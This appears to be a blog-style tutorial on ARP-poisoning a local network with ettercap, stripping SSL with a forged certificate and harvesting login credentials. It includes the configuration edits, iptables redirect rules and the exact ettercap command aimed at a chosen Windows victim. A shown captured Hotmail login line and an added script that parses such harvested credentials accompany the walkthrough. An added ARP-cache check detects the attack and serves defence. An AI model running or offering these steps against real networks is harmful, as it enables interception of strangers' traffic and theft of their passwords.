The attacker's machine is running Ubuntu 9.10, and the victims tested were both Ubuntu and Windows 7.
Edit /etc/etter.conf and, in the [privs] section, set ec_uid and ec_gid to 0 so that ettercap keeps root privileges after it starts. This is dangerous: anyone with a method for counter-attacking ettercap itself now gets root on the attacker's machine. It is, however, what lets ettercap install the iptables rules that redirect ports so it can break SSL connections and substitute its own certificate. Those iptables rules are already in etter.conf (the Linux entries for redir_command_on/off) and just need to be uncommented:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
You may also need to enable kernel IP forwarding (the # is the root prompt):
#echo 1 > /proc/sys/net/ipv4/ip_forward
Note that in unified sniffing mode ettercap forwards the intercepted packets itself and turns kernel forwarding off while it runs, so this step only matters if something other than ettercap is doing the forwarding.
To get away from the noisy method used previously, it is best to pick on one host at a time. A quiet nmap host-discovery sweep of the network gives you an idea of which IP addresses will make a good target; Windows desktops are the obvious choice.
All you need to do is fire up ettercap as before, but use arp:remote instead of plain arp and give it both targets: the first target (here .168, the host the victim's traffic passes through) and the victim's IP address. The remote option makes ettercap also sniff the connections the victim makes to addresses beyond that first target. I chose .24, a Windows 7 machine.
#ettercap -Tqi wlan0 -M arp:remote /192.168.168.168/ /192.168.168.24/
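Once the poisoning above is running, the victim's ARP cache maps the first target's IP to the attacker's MAC, so one MAC address answers for two IPs. The following is an added example (not part of the original post, and not ettercap code) of the victim-side check: it parses the Linux /proc/net/arp format and reports MACs claimed by more than one IP. The two tables, the MAC addresses, and the assumption that 192.168.168.168 is the gateway and 192.168.168.5 is the attacker are constructed for the example.

```python
"""Detect the ARP poisoning above from the victim's own ARP cache (Linux).

Added example, not from the original post. Parses the /proc/net/arp
format and flags a MAC that answers for more than one IP, which is what
`-M arp:remote` leaves behind on the victim. All sample data below is
constructed; 192.168.168.168 is assumed to be the gateway and
192.168.168.5 the attacker.
"""
from collections import OrderedDict

# Constructed sample of /proc/net/arp on a healthy victim.
CLEAN_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.168.168  0x1         0x2         00:50:56:aa:bb:01     *        wlan0
192.168.168.5    0x1         0x2         00:1c:bf:aa:bb:02     *        wlan0
"""

# Same victim after the attacker at .5 poisons it: the gateway entry now
# carries the attacker's MAC (constructed).
POISONED_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.168.168  0x1         0x2         00:1c:bf:aa:bb:02     *        wlan0
192.168.168.5    0x1         0x2         00:1c:bf:aa:bb:02     *        wlan0
"""


def parse_arp_table(text):
    """Return (ip, mac, device) tuples for complete entries (ATF_COM flag set)."""
    entries = []
    for line in text.splitlines()[1:]:          # first row is the header
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hwtype, flags, mac, _mask, dev = fields[:6]
        if int(flags, 16) & 0x2 == 0:           # incomplete entry, MAC is not usable
            continue
        entries.append((ip, mac.lower(), dev))
    return entries


def find_mac_collisions(entries):
    """Map every MAC claimed by more than one IP to the list of those IPs."""
    by_mac = OrderedDict()
    for ip, mac, _dev in entries:
        by_mac.setdefault(mac, []).append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_is_spoofed(text, gateway_ip, known_gateway_mac):
    """True if the cached MAC for the gateway differs from one recorded earlier."""
    for ip, mac, _dev in parse_arp_table(text):
        if ip == gateway_ip:
            return mac != known_gateway_mac.lower()
    return False                                # no entry yet, nothing to compare


if __name__ == "__main__":
    for label, table in (("clean", CLEAN_ARP), ("poisoned", POISONED_ARP)):
        print(label, find_mac_collisions(parse_arp_table(table)))
```

On a real Linux victim, feed it the contents of /proc/net/arp; a Windows 7 victim like the one in the post shows the same collision in `arp -a`, but in a different layout that this parser does not handle. A MAC collision involving the gateway while the poisoning is active is the signal; comparing against a previously recorded gateway MAC catches it even when the attacker's own entry has expired from the cache.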
This is where the attacker depends on user ignorance and/or impatience: when the victim visits a site that uses SSL to encrypt the connection, the browser shows a full-page warning that the certificate is not trusted and something is wrong... which most users promptly click through...
By accepting the invalid certificate ettercap presents, the victim hands the attacker's machine a cleartext view of all the data that should have been encrypted: ettercap terminates the victim's SSL session with its own certificate and opens a second one to the real server. Furthermore, when ettercap sniffs a login, it immediately displays the credentials to the attacker in an easy-to-read format such as this:
HTTP : 65.54.165.179:443 -> USER: [removed]@hotmail.com PASS: [removed] INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1267474281&rver=6.0.5285.0&wp=MBI&wreply=http://mail.live.com/default.aspx&lc=1033&id=6485
Of course I removed the user name and password, since I don't want to show the world, but you can try this with your own account and see them clear as day.
This attack is particularly devastating when aimed at services that use expired, self-signed, or otherwise problematic certificates. Those services have trained their users to ignore the browser warning, so the one chance users have to stop and think twice is destroyed.
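The credential record ettercap prints above is one line per captured login, with the dissector name, the server address, the user, the password and an INFO field holding the URL that was posted to. Below is an added example (not ettercap code, not from the original post) that parses those lines into records and splits the INFO URL into its path and query so that fields such as wreply, the page the user was headed to, can be read directly. The sample output is constructed from the line shown above, with the same [removed] placeholders, plus a second constructed FTP-style line without an INFO field and one non-credential line to show what the parser skips.

```python
"""Parse the one-line credential records ettercap prints when it sees a login.

Added example, not ettercap's own code. The line format is taken from the
record shown in the post; SAMPLE_OUTPUT is constructed from it (same
[removed] placeholders), with a second constructed line that has no INFO
field and one unrelated status line.
"""
import re
from urllib.parse import parse_qsl

SAMPLE_OUTPUT = """\
ARP poisoning victims:
HTTP : 65.54.165.179:443 -> USER: [removed]@hotmail.com PASS: [removed] INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1267474281&rver=6.0.5285.0&wp=MBI&wreply=http://mail.live.com/default.aspx&lc=1033&id=6485
FTP : 192.168.168.1:21 -> USER: anonymous PASS: guest
"""

# proto : host:port -> USER: u PASS: p [INFO: url]
# USER and PASS are matched lazily so a password containing spaces still
# ends at the next field marker; INFO is optional and never contains spaces.
CRED_RE = re.compile(
    r"^(?P<proto>\S+)\s*:\s*(?P<host>[^\s:]+):(?P<port>\d+)\s*->\s*"
    r"USER:\s*(?P<user>.*?)\s+PASS:\s*(?P<password>.*?)"
    r"(?:\s+INFO:\s*(?P<info>\S+))?$"
)


def split_info(info):
    """Split the INFO URL (no scheme, as ettercap prints it) into path and query dict."""
    if info is None:
        return None, {}
    path, _sep, query = info.partition("?")
    return path, dict(parse_qsl(query, keep_blank_values=True))


def parse_cred_line(line):
    """Return a record dict for a credential line, or None for any other line."""
    m = CRED_RE.match(line.rstrip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["info_path"], rec["info_query"] = split_info(rec.pop("info"))
    return rec


def extract_credentials(output):
    """All credential records found in a blob of ettercap text output."""
    return [r for r in (parse_cred_line(l) for l in output.splitlines()) if r]


if __name__ == "__main__":
    for rec in extract_credentials(SAMPLE_OUTPUT):
        print(rec["proto"], rec["host"], rec["port"], rec["user"],
              rec["info_path"], rec["info_query"].get("wreply"))
```

Note that the dissector name is HTTP even though the server port is 443: ettercap has already stripped the SSL layer before its HTTP dissector sees the POST, which is exactly the point of the attack.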